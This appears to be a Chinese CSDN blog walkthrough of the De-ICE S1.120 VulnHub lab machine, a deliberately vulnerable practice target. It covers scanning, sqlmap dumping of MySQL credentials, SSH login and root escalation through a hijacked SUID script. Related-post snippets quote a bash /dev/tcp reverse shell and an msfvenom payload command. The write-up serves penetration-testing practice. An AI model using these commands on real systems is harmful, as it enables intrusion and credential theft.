De-ICE_S1.120靶机

于 2024-07-29 23:54:15 发布
阅读量196 收藏 1
点赞数 9
文章标签: 网络安全 开源 安全 github web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61995767/article/details/140783942
版权

一、信息收集

步骤一:根据靶机描述得知该靶机的IP只能为192.168.1.120

那就只能将攻击机kali以及靶机均设为仅主机模式,并配置虚拟网络编辑器:

步骤二:查看靶机的MAC地址

步骤三:在kali上扫描目标主机

arp-scan -l

步骤四:使用nmap扫描开放的端口

nmap -sV -p- 192.168.1.120

步骤五:浏览器访问

步骤六:使用dirb扫描目录

dirb http://192.168.1.120

无可利用信息,返回刚开始的页面,看有无可用利用点

步骤七:点击View Products,在点击submit,发现url中出现?id=1

http://192.168.1.120/products.php?id=1

将url使用kali上sqlmap测试,查询其是否存在SQL注入

发现存在SQL注入

sqlmap -u http://192.168.1.120/products.php?id=1 --dbs

sqlmap -u http://192.168.1.120/products.php?id=1 -D mysql --tables 

sqlmap -u http://192.168.1.120/products.php?id=1 -D mysql -T user --columns

sqlmap -u http://192.168.1.120/products.php?id=1 -D mysql -T user -C User,Password --dump --batch

得到账号密码

步骤八:根据开放的22端口,尝试使用ssh连接

ssh -oHostKeyAlgorithms=+ssh-rsa ccoffee@192.168.1.120

发现是普通用户

二、提权

sudo提权

find / -perm -u=s -type f 2>/dev/null

进入getlogs.sh文件的目录 确定suid权限

cd /home/ccoffee/scripts/
ls -al

创建一个备份,将getlogs.sh移至getlogs.sh.bak,然后使用以下代码创建一个新的getlogs.sh文件以生成一个shell

mv getlogs.sh getlogs.sh.bak
echo "/bin/bash" >  getlogs.sh
chmod 777 getlogs.sh

提权成功

嗷嗷~嗷嗷~
关注
  • 9
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机系列:De-ICE: S1.120
汗的博客
03-30 1429
https://www.hackingarticles.in/hack-the-de-ice-s1-120-vm-boot-to-root/ 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外i...
(VulnHub靶机通关)breach系列:breach-2.1细节通关方法
yang1234567898的博客
01-26 3580
靶机下载地址:https://download.vulnhub.com/breach/Breach-2_final2.1.zip 需要配置仅主机模式
【VulnHub靶机系列】De-ICE: S1.100
Ms08067安全实验室
02-21 234
文章来源 | MS08067安全实验室本文作者:大方子(实验室核心成员) — 实验室旗下直播培训课程 —来和20000+位同学加入MS08067一起学习吧!
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 3677
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
vulnhub靶场-Hacker_Kid-v1.0.1
qq_42947816的博客
06-27 1567
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
Mr.Robot靶机 - 机器人先生
Ms08067安全实验室
03-02 2200
本文作者:恩格尔-src小组﹀﹀﹀靶机简介:靶机主题来自美剧《黑客军团》,这是一部传达极客精神和黑客文化的上佳作品,不同于《硅谷》的搞笑风格,这部剧的主角Eliot患有精神分裂,整部剧的...
JIS-CTF-VulnUpload-CTF01靶机渗透测试
weixin_52971422的博客
04-11 3506
靶机名:JIS-CTF-VulnUpload-CTF01 攻击机:kali 任务寻找5个flag 靶机信息扫描 Nmap -sV -A -p- ip 信息收集 发现有Robots协议 上网页 成功拿到第一个flag 上到/admin_area发现了第二个flag和网页用户 上到/login.php登录 登录上去后发现有个文件上传 直接上传一个shell.php上去看看 好像成功上传上去了,在前面robots.txt里有uploaded_files的
vulnhub靶机Five86-1渗透笔记
liver100day的博客
09-07 1278
文章目录1.环境搭建2.主机发现3.漏洞利用4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:sick0s1.1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 2.主机发现 3.漏洞利用 4.提权 5.总结 ...
kali渗透综合靶机(八)--Billu_b0x靶机
W小哥
03-17 2550
一、靶机下载 下载链接:https://download.vulnhub.com/billu/Billu_b0x.zip 二、Billu_b0x靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.59.129 靶机IP:192.168.59.131 1...
DC-1靶机渗透测试记录
qq_33163046的博客
12-18 9572
攻击机 kali-linux-2020.4-vbox-i386 设置 USB设备关闭,网络连接方式仅主机(Host-Only)网络。 攻击机IP 192.168.56.103 步骤1 靶机目标发现 因为靶机和攻击机在同一个网络内,所以使用KALI上arp-scan -l 进行扫描。扫描确定了靶机的IP是192.168.56.102。 ┌──(root??kali)-[~] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 08:00:27:83:c
CISP-PTE_windows操作系统安全V2.0.pptx
10-22
CISP-PTE_windows操作系统安全V2.0 Windows 操作系统安全是计算机安全的重要组成部分。... ... ...访问控制是 Windows 操作系统安全的重要组成部分。访问控制列表(Access Control List,ACL)是 NTFS 文件系统的重要组成...
Kioptrix2-WalkThrough 靶机复现.docx
10-18
1. 信息收集:使用 nmap 工具对靶机进行 IP 探活和端口扫描。 2. SQL 注入:使用万能密码尝试登录到靶机上。 3. 命令执行:使用;pwd 命令来确定当前目录,并执行系统命令。 4. 反弹 shell:使用 nc 命令将 shell ...
CFS.zip_CFS-GA_cfs
09-21
1. **混沌序列生成**:CFS的核心是使用混沌系统生成伪随机序列,这些序列用于混淆数据。混沌系统的特性使其产生的序列具有高度的不可预测性,增强了加密的安全性。 2. **数据分块**:原始文件被分割成多个小的数据...
Metasploitable_ubuntu-book.zip
07-14
《Metasploit渗透测试魔鬼训练营》中的"Metasploitable_ubuntu-book.zip"是一个针对安全研究人员和IT专业人员的教育资源,它提供了一个Linux靶机环境,特别适合学习和测试安全漏洞。靶机,简单来说,就是一种模拟...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8350
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
NVIDIA 全面转向开源 GPU 内核模块
专注于人工智能领域的小何尚
07-24 1072
为简化起见,我们以表格形式压缩了软件包管理器建议。驱动程序版本 560 和 CUDA Toolkit 12.6 之后的所有版本都将使用这些打包约定。
SpringBoot3 JDK21 Vue3开源后台RBAC管理系统 | 2024年好用的开源RBAC管理系统 | 数据权限的探索
feiyuchuixue的博客
07-23 1037
在数据权限构建的这场复杂而深刻的旅程中,作者经过了深思熟虑和不懈的探索。我们在这里展示的解决方案,虽然可能不是完美无瑕,但它代表了我们对问题的一种理解和尝试。我们希望这不仅仅是一个方案的展示,更是一个思考的起点。 同时,作者在实现数据权限的过程中,不禁提出了一个关键问题:“我们是否真的需要构建如此复杂的数据权限体系?这样的复杂性是否真正为我们带来了价值?” 。 我们鼓励每一位用户,带着这样的问题,来体验此功能。
开源消息队列比较
最新发布
AngelCryToo的专栏
07-24 879
Apache Kafka、RabbitMQ、Apache ActiveMQ、Redis (with Redis Streams) 、NATS、Apache Pulsar、ZeroMQ、Apache RocketMQ、NSQ、Kafka Streams等消息队列漫谈
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe这个IP是靶机IP还是虚拟机ip
05-27
这个 IP 是指你的攻击机器 (Kali Linux) 上用于监听的 IP 地址。 假设你的攻击机器 IP 地址为 192.168.1.100,你想要在靶机上运行一个反向 TCP Meterpreter,那么你可以使用以下命令生成 Payload 文件: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe ``` 其中,LHOST 参数指定了反向连接时的目标 IP 地址,即指定 Meterpreter 连接的攻击机器 IP 地址。LPORT 参数指定了监听的端口号,这个端口号需要和后面启动 Meterpreter listener 时使用的端口号一致。 在生成 Payload 文件后,你需要将它传输到靶机上,并在靶机上运行它。当 Payload 文件在靶机上被执行时,它会尝试连接到你指定的攻击机器 IP 地址和端口号,从而建立反向连接。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值